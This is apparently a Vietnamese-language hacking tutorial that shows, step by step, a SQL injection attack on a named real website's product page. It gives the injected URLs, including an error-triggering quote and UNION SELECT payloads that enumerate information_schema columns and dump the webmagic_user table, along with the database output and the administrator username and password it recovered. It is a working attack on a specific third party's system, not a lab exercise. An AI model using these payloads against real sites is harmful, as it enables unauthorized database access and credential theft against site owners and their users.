tut thêm =-1148952776'

b1:http://hamu.com.cn/webpage/product_detail.php?id=1148952776
ta thường dấu ' hoac - nhưng dạng này nó ko chịu.kiểu này khó đây,ta thử thêm - và ' xem sao lỗi rùi
b2:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776'
ra kết quả:
Database error: Invalid SQL: SELECT * FROM webmagic_info WHERE info_id='-1148952776''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1148952776''' at line 1)
Session halted.
b3:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' union select 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()-- -

ra kết quả:

ProductID: 2

Description: account_id,account_name,account_pwd,account_dept,account_lastlogin,account_lastloginfrom,account_type,account_status,account_lastpwd

b4:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database() and table_name=0x7765626d616769635f75736572-- -

ra kết quả:

ProductID: 2

Description: id,username,password

b5:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(username,0x2f,password))),6,7,8,9,10,11,12,13 from webmagic_user-- -

ra kết quả:

ProductID: 2

Description: admin/admin

Related Post: